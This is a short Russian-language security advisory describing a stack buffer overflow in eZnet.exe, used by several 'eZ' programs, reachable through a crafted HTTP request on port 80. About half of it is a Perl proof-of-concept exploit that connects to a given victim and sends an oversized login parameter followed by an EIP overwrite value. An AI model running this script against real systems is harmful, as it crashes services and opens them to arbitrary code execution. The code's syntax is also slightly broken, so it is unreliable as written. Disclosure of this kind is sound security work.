Программа: eZ 'eZnet.exe'
Уязвимость обнаружена в нескольких 'eZ' программах, включая eZphotoshare, eZmeeting, eZnetwork, и eZshare. Удаленный пользователь может выполнить произвольный код на целевой системе.
Удаленный пользователь может послать специально сформированный пакет к 80 TCP порту, чтобы врывать переполнение буфера в
eZnet.exe. Удаленный пользователь может аварийно завершить работу службы или выполнить произвольный код на целевой системе.
Эксплоит:
#!/usr/bin/perl -w
# Stack Overflow Vulnerability in eZphotoshare - PoC
# - by Peter Winter-Smith [peter4020@hotmail.com]
use IO::Socket;
if(!($ARGV[0]))
print "Usage: eZstack.pl <victim>\n\n";
exit;
print "Stack Overflow PoC\n";
$victim = IO::Socket::INET->new(Proto=>'tcp',
PeerAddr=>$ARGV[0],
PeerPort=>"80")
or die "Unable to connect to $ARGV[0] on port
80";
$eip = "\x58\x58\x58\x58";
$packet = "" .
"GET /SwEzModule.dll?operation=login&autologin=" .
"a"x4653 . $eip .
"\x20HTTP/1.0.User-Agent: SoftwaxAsys/2.1.10\n\n";
print $victim $packet;
print " + Making Request ...\n";
sleep(4);
close($victim);
print "Done.\n";
exit;